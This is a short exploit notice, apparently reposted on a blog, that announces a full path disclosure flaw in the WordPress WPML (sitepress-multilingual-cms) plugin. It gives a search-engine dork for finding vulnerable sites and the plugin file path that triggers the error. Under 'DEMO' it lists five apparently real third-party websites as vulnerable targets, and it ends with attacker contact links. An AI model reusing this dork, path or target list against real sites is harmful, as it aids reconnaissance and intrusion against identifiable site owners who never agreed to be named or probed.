Wordpress plugins sitepress-multilingual-cms Full Path Disclosure | BOT24

Wordpress plugins sitepress-multilingual-cms Full Path Disclosure


# Exploit Title: Wordpress plugins- sitepress-multilingual-cms Full Path Disclosure vulnerability
# Date: 04/12/2012
# Author: The Black Devils
# Category : [ webapps ]
# Dork:inurl:"sitepress-multilingual-cms"
# Type : php
# Tested on: [Windows] & [Ubuntu]


http://Localhost/wp-content/plugins/sitepress-multilingual-cms/sitepress.php


DEMO
http://www.clinique-montaigne.fr/wp-content/plugins/sitepress-multilingual-cms/sitepress.php
http://piwik.org/wp-content/plugins/sitepress-multilingual-cms/sitepress.php
http://iamvery.bip-bip.fr/wp-content/plugins/sitepress-multilingual-cms/sitepress.php
http://www.4gsecure.fr/test/wp-content/upgrade/sitepress-multilingual-cms.tmp/sitepress-multilingual-cms/sitepress.php
http://www.dahabtravel.eu/wp/wp-content/plugins/sitepress-multilingual-cms/sitepress.php


#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment